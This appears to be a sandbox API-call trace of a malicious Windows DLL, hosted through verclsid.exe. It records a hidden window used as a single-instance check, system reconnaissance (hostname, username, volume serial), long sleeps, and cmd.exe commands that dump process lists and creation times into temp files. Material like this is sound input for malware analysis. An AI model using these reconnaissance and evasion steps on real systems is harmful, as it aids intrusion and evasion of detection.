[0382.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0382.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x1fa8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHParseDisplayName", lpUsedDefaultChar=0x0) returned 18
[0382.796] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHParseDisplayName") returned 0x7fefe274570
[0382.796] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7fefdf10000
[0382.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0382.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x1fa8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitialize", lpUsedDefaultChar=0x0) returned 12
[0382.796] GetProcAddress (hModule=0x7fefdf10000, lpProcName="CoInitialize") returned 0x7fefdf2a51c
[0382.797] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x7fefb2c0000
[0382.801] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.801] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTcpTable", lpUsedDefaultChar=0x0) returned 11
[0382.801] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="GetTcpTable") returned 0x7fefb2d13ac
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetTcpEntry", lpUsedDefaultChar=0x0) returned 11
[0382.802] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="SetTcpEntry") returned 0x7fefb2d2fb0
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x1fa8d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCreateFile", lpUsedDefaultChar=0x0) returned 14
[0382.802] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpCreateFile") returned 0x7fefb2c8250
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x1fa8d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCloseHandle", lpUsedDefaultChar=0x0) returned 15
[0382.802] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpCloseHandle") returned 0x7fefb2c7cc0
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x1fa8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpSendEcho", lpUsedDefaultChar=0x0) returned 12
[0382.803] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpSendEcho") returned 0x7fefb2c8340
[0382.803] DisableThreadLibraryCalls (hLibModule=0xf0000) returned 1
[0382.803] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0382.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Control_RunDLL", cbMultiByte=14, lpWideCharStr=0x1ccb60, cchWideChar=2047 | out: lpWideCharStr="Control_RunDLL") returned 14
[0382.804] DllGetClassObject (rclsid=0x227150*(Data1=0xa78ed123, Data2=0xab77, Data3=0x406b, Data4=([0]=0x99, [1]=0x99, [2]=0x2a, [3]=0x5d, [4]=0x9d, [5]=0x2f, [6]=0x7f, [7]=0xb7)), riid=0x7fefe096cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ce830)
[0382.804] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0382.806] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0382.806] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x1ce406 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0382.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0382.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1f7d9e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0382.807] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x1cd320, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0382.807] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x1ce3b0 | out: lpFindFileData=0x1ce3b0*(dwFileAttributes=0x226a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x226a70, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1036fd, nFileSizeHigh=0x0, nFileSizeLow=0x1ce3d0, dwReserved0=0x0, dwReserved1=0x1ce3f8, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0382.808] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ce076, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")) returned 0x20
[0382.808] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x1ce086 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0382.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0382.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1f7da30, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0382.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x1ccfa0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0382.809] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x1ce030 | out: lpFindFileData=0x1ce030*(dwFileAttributes=0x226a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x226a70, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1036fd, nFileSizeHigh=0x0, nFileSizeLow=0x1ce050, dwReserved0=0x0, dwReserved1=0x1ce078, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0382.809] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0382.809] FindWindowW (lpClassName="msprot-clonB7", lpWindowName=0x0) returned 0x0
[0382.809] GetModuleFileNameW (in: hModule=0xf0000, lpFilename=0x1ce3c4, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")) returned 0x52
[0382.810] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x1cd200, cchWideChar=2047 | out: lpWideCharStr="task+") returned 4
[0382.810] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll"), lpFindFileData=0x1ce028 | out: lpFindFileData=0x1ce028*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8f4eb60, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf8f4eb60, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf8f9ae20, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x35400, dwReserved0=0x0, dwReserved1=0x1ce050, cFileName="B79266.DLL", cAlternateFileName="")) returned 0x2176f0
[0382.810] FileTimeToLocalFileTime (in: lpFileTime=0x1ce02c, lpLocalFileTime=0x1ce278 | out: lpLocalFileTime=0x1ce278) returned 1
[0382.810] FileTimeToSystemTime (in: lpFileTime=0x1ce278, lpSystemTime=0x1ce018 | out: lpSystemTime=0x1ce018) returned 1
[0382.811] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1ce5cc, lpMaximumComponentLength=0x1ce5c8, lpFileSystemFlags=0x1ce5c4, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1ce5cc*=0x8443a5af, lpMaximumComponentLength=0x1ce5c8*=0xff, lpFileSystemFlags=0x1ce5c4*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0382.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1117525688", cbMultiByte=10, lpWideCharStr=0x1cd000, cchWideChar=2047 | out: lpWideCharStr="1117525688") returned 10
[0382.812] LoadLibraryW (lpLibFileName="SHFolder.dll") returned 0x7fef79b0000
[0382.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderPathW", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16
[0382.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderPathW", cchWideChar=16, lpMultiByteStr=0x1f8c100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderPathW", lpUsedDefaultChar=0x0) returned 16
[0382.896] GetProcAddress (hModule=0x7fef79b0000, lpProcName="SHGetFolderPathW") returned 0x7fef79b12c0
[0382.896] SHGetFolderPathW (in: hwnd=0x0, csidl=103, hToken=0x0, dwFlags=0x0, pszPath=0x1ce086 | out: pszPath="") returned 0x80070057
[0382.897] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1ce086 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0
[0382.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48
[0382.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cchWideChar=48, lpMultiByteStr=0x1f7da80, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", lpUsedDefaultChar=0x0) returned 48
[0382.909] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cbMultiByte=48, lpWideCharStr=0x1ccfa0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0") returned 48
[0382.909] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\jdownloader 2.0"), lpFindFileData=0x1ce030 | out: lpFindFileData=0x1ce030*(dwFileAttributes=0x226a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x226a70, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x1ce086, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1ce5c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0382.909] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x1cd200, cchWideChar=2047 | out: lpWideCharStr="task酀\"") returned 4
[0382.909] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x1cd200, cchWideChar=2047 | out: lpWideCharStr="task酀\"") returned 4
[0382.910] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x1ccf60, cchWideChar=2047 | out: lpWideCharStr="1136.dat") returned 8
[0382.910] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x1cdff0 | out: lpFindFileData=0x1cdff0*(dwFileAttributes=0xbe587109, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x100917, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x1ce860, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xbe587109, nFileSizeHigh=0x0, nFileSizeLow=0x226a70, dwReserved0=0x0, dwReserved1=0x10da8c, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0382.910] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x127328 | out: lpWSAData=0x127328) returned 0
[0382.928] gethostname (in: name=0x1ce22b, namelen=100 | out: name="Q9iATrkPrH") returned 0
[0382.981] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Q9iATrkPrH", cbMultiByte=10, lpWideCharStr=0x1cd170, cchWideChar=2047 | out: lpWideCharStr="Q9iATrkPrH") returned 10
[0382.981] WSACleanup () returned 0
[0383.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x117720, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x1ce28c | out: lpThreadId=0x1ce28c*=0xd18) returned 0xd0
[0383.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x1cd200, cchWideChar=2047 | out: lpWideCharStr="task°\x1c") returned 4
[0383.002] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0383.002] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x1f8c1f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msprotB7", lpUsedDefaultChar=0x0) returned 8
[0383.002] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0383.002] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0383.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="msprotB7", cbMultiByte=8, lpWideCharStr=0x1cd1b0, cchWideChar=2047 | out: lpWideCharStr="msprotB7") returned 8
[0383.003] RegisterClassW (lpWndClass=0x1ce248) returned 0xc1bf
[0383.003] CreateWindowExW (dwExStyle=0x10000, lpClassName="msprotB7", lpWindowName="", dwStyle=0x80, X=1, Y=1, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xf0000, lpParam=0x0) returned 0x60386
[0383.007] NtdllDefWindowProc_W () returned 0x0
[0383.007] NtdllDefWindowProc_W () returned 0x1
[0383.012] NtdllDefWindowProc_W () returned 0x0
[0383.017] GetMessageW (lpMsg=0x1ce5d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0)
[0398.724] NtdllDefWindowProc_W () returned 0x0
[0398.724] NtdllDefWindowProc_W () returned 0x0
[0398.724] NtdllDefWindowProc_W () returned 0x0
[0398.724] NtdllDefWindowProc_W () returned 0x0
Thread:
id = 112
os_tid = 0xd1c
Thread:
id = 113
os_tid = 0xd18
[0383.017] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24cf5d6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0383.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0383.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cchWideChar=43, lpMultiByteStr=0x1f7dad0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", lpUsedDefaultChar=0x0) returned 43
[0383.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cbMultiByte=43, lpWideCharStr=0x24ce4f0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat") returned 43
[0383.018] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\11.dat"), lpFindFileData=0x24cf580 | out: lpFindFileData=0x24cf580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1036fd, nFileSizeHigh=0x0, nFileSizeLow=0x24cf5a0, dwReserved0=0x0, dwReserved1=0x24cf5c8, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0383.018] Sleep (dwMilliseconds=0x2bf20)
[0398.665] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c WMIC PROCESS where name=\"wininit.exe\" get creationdate |more > %TEMP%\\~dr9078", lpDirectory=0x0, nShowCmd=0) returned 0x2a
[0399.765] Sleep (dwMilliseconds=0x2710)
[0409.783] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24cf5d6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0409.785] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c tasklist /fo csv >> C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", lpDirectory=0x0, nShowCmd=0) returned 0x2a
[0409.914] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7feff870000
[0409.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetUserNameW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0409.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetUserNameW", cchWideChar=12, lpMultiByteStr=0x1f8c250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetUserNameW", lpUsedDefaultChar=0x0) returned 12
[0409.914] GetProcAddress (hModule=0x7feff870000, lpProcName="GetUserNameW") returned 0x7feff881fd0
[0409.915] GetUserNameW (in: lpBuffer=0x24cf6d6, pcbBuffer=0x24cf6d0 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x24cf6d0) returned 1
[0409.915] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24cf5d6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0409.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0409.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cchWideChar=43, lpMultiByteStr=0x1f7db20, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", lpUsedDefaultChar=0x0) returned 43
[0409.915] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cbMultiByte=43, lpWideCharStr=0x24ce4f0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat") returned 43
[0409.915] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\23.bat"), lpFindFileData=0x24cf580 | out: lpFindFileData=0x24cf580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1036fd, nFileSizeHigh=0x0, nFileSizeLow=0x24cf5a0, dwReserved0=0x0, dwReserved1=0x24cf5c8, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0409.916] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x24ce4b0, cchWideChar=2047 | out: lpWideCharStr="1136.datɌ") returned 8
[0409.917] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x24cf540 | out: lpFindFileData=0x24cf540*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x100917, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x24cf5a0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xfa872, nFileSizeHigh=0x25, nFileSizeLow=0x24cf570, dwReserved0=0x0, dwReserved1=0x10367a, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0409.917] Sleep (dwMilliseconds=0xbb8)
[0409.919] Sleep (dwMilliseconds=0x0)
[0409.990] Sleep (dwMilliseconds=0xbb8)
[0410.109] Sleep (dwMilliseconds=0x0)
[0410.166] Sleep (dwMilliseconds=0xbb8)
[0410.202] Sleep (dwMilliseconds=0x1f40)
[0410.233] Sleep (dwMilliseconds=0xbb8)
[0410.286] Sleep (dwMilliseconds=0x7d0)
[0410.292] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="c:\\act\\13.dat", cbMultiByte=13, lpWideCharStr=0x24ce3c0, cchWideChar=2047 | out: lpWideCharStr="c:\\act\\13.dat\x0f") returned 13
[0410.292] FindFirstFileW (in: lpFileName="c:\\act\\13.dat" (normalized: "c:\\act\\13.dat"), lpFindFileData=0x24cf450 | out: lpFindFileData=0x24cf450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x4a0048, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x23f5f0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x236e00, dwReserved0=0x0, dwReserved1=0x25, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0410.294] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x24cf500 | out: lpWSAData=0x24cf500) returned 0
